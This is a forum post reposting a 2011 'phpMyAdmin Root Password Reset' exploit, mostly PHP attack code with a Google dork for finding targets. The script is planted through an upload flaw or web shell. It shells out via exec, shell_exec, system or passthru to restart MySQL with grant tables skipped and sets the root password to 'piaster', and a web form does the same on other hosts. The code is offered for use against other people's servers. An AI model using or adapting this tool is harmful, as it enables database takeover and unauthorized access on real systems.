SpareNet Servers Advertising & Link Exchange


هیچ اطلاعیه ای هنوز ایجاد نشده است .

phpMyAdmin Root Password Reset

  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • phpMyAdmin Root Password Reset


    # Exploit Title: [phpMyAdmin Root Password]
    # Date: [21/6/2011]
    # Home:
    # Author: [Piaster (wadelamin)]
    # phpmyadmin: Software Link: [ ||]
    # Version: [all phpmyadmin Version]
    # Category:: [remote, local]
    # Google dork: [inurl:phpMyAdmin ||  The AppServ Open Project - [all Version] for Windows ]
    # Tested on: [Windows & unix]
    # E-mail: [email protected]
    # Page:
    File Bug:
    echo "Welcome to AppServ MySQL Root Password Reset Program\n\n";
    function AppServCMD() {
        echo " Enter New Password : ";
        $input = trim(fgets(STDIN,256));
        $input = ereg_replace('\"', "\\\"", $input);
        $input = ereg_replace('\'', "\'", $input);
        echo "\n   Please wait ...................................\n\n";
        exec ("net stop mysql");
        exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
    //You can add a password and then request the file via the browser
        exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\"");
        exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown");
        exec ("net start mysql");
    I've modified the file and then request the file from abroad
    But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script
    And then request the file via the browser
    There Important Note:
    If the Windows server can access phpMyAdmin immediately
    if the file to complete the process this means that
    it is restarted the Mysql and then change the password.
    //---------------------------------Exploit the vulnerability tool------------------------//
    echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px  gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="" target="_blank">Facebook</a>';
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    if(function_exists('exec')){$pias = exec;}
    elseif(function_exists('shell_exec')){$pias = shell_exec;}
    elseif(function_exists('system')) {$pias = system ;}
    elseif(function_exists('passthru')) { $pias = passthru ;}
    if($win) {
        $input = trim(fgets(STDIN,256));
        $input = ereg_replace('\"', "\\\"", $input);
        $input = ereg_replace('\'', "\'", $input);
        echo "\n   Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
        $pias("net stop mysql");
        $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
        $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
        $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
        $pias("net start mysql");} 
    if(!$win) {
    echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';
    $dbu = $_REQUEST['dbu'];
    $dbp = $_REQUEST['dbp'];
    $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
    $conn = @mysql_connect($dbh, $dbu, $dbp);
    $select = @mysql_select_db('mysql', $conn);
    if (!$select) {
    echo @mysql_error();}
    $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
    $go1 = @mysql_query( $t1 , $conn);
    if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
    else echo 'database mysql not acsses or not found ty agin';}}
    echo '<br><br>By Piaster :: [email protected] :: '. $f ;
صبر کنید ..